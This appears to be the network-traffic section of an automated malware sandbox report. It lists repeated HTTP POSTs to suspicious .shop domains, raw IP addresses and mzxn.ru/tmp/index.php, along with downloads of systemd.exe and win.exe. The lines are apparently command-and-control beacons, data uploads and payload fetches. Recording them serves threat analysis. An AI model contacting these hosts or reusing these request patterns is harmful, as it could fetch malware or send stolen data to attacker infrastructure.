Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18158Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 566562Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20432Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: callosallsaospz.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1268Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 568846Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: liernessfornicsa.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.137User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 107.173.160.139User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1267
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Host: 167.235.128.153User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Connection: closeContent-Type: text/plainContent-Length: 1122
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://crbyycflvhqviag.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://rkjvhpickvgumugy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mlolxnvijkbxdkju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 314Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://crtrnvacvaqsvh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://igyjobtodmctowt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sowhywcgsmotmk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wathnngxbyoowmd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 363Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fcdtsqtavhskibhj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /systemd.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 77.221.157.163
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gepaukacbiyo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uuinbvqevufc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ewndxwxqsldh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pcatlfkkstdxqqw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 286Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cxcsmobdatpu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: mzxn.ru
Source: global traffic	HTTP traffic detected: GET /win.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 64.190.113.113
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qnawhflyfaljta.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 334Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://soaxpgcflilwcjk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jtecgpbonqhjbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kriqrmlnqypou.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wrfvitgbvcw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bnvcslusckae.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: mzxn.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qinwutyayfcko.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: mzxn.ru
